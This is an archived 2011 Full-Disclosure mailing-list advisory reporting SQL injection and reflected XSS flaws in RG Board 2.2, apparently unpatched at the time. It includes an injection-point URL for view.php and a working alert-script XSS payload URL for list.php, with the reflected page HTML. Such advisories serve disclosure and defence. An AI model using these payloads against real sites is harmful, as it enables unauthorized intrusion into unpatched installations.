'[Full-disclosure] INSECT Pro - Advisory 2011 0628 - SQL Injection -'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] INSECT Pro - Advisory 2011 0628 - SQL Injection -
From:       Juan Sacco <jsacco () insecurityresearch ! com>
Date:       2011-06-28 13:30:07
Message-ID: cf94bb76e122e60b15aa7c110557bbba () insecurityresearch ! com
[Download RAW message or body]

 Information
 --------------------
 Name : SQL Injection and XSS discovered
 Software : RG Board 2.2
 Vendor Homepage : http://www.rgboard.com/
 Vulnerability Type : SQL injection and XSS reflected
 Severity : High
 Researcher : Juan Sacco <jsacco [at] insecurityresearch [dot] com>

 Description
 ------------------
 RG Board 2.2 is prone to a SQL Injection and XSS reflected 
 vulnerabilitys because the application fails to properly perform 
 adequate boundary checks on user-supplied data.
 An attacker can exploit this issue to compromise the victim's machine.

 Details
 -------------------
 SQL injection is a code injection technique that exploits a security 
 vulnerability occurring in the database layer of an application (like 
 queries).

 Cross-site scripting (XSS) is a type of computer security vulnerability 
 typically found in web applications that enables attackers to inject 
 client-side script into web pages viewed by other users.

 Exploit example as follow
 -----------------------------

 SQL Injection:
 http://target.com/main/view.php?bbs_code=[injectme]&bd_num=106&kw=&ss[sc]=1&ss[st]=1
 This vulnerability affects /main/view.php using method GET

 XSS:
 http://target.com/main/list.php?bbs_code=news&page=1%3cScRiPt%20%3ealert%28/XSS/%29%3c%2fScRiPt%3e

 The vulnerability is caused by the following code:
 <form id="category_form" action="?" method="get" 
 enctype="multipart/form-data">
 <p id="ba_content_list_top"><input type="hidden" name="bbs_code" 
 value="news" />
 <span class="floating_left">Category: <select name="ss[cat]" 
 onchange="this.form.submit();">
 <option value="">All</option>
 <option value="7">News</option>
 <option value="8">PR</option>
 <option value="9">Video</option>
 </select></span> <span class="floating_right">Total : 47 (1<ScRiPt 
 >alert(/XSS/)</ScRiPt>/3)</span></p>
 </form>


 Solution
 -------------------
 No patch are available at this time.

 Credits
 -------------------
 Manual discovered by Insecurity Research Labs
 Juan Sacco - http://www.insecurityresearch.com

-- 
 _________________________________________________
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 Insect Pro 2.6.1 was released stay tunned

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic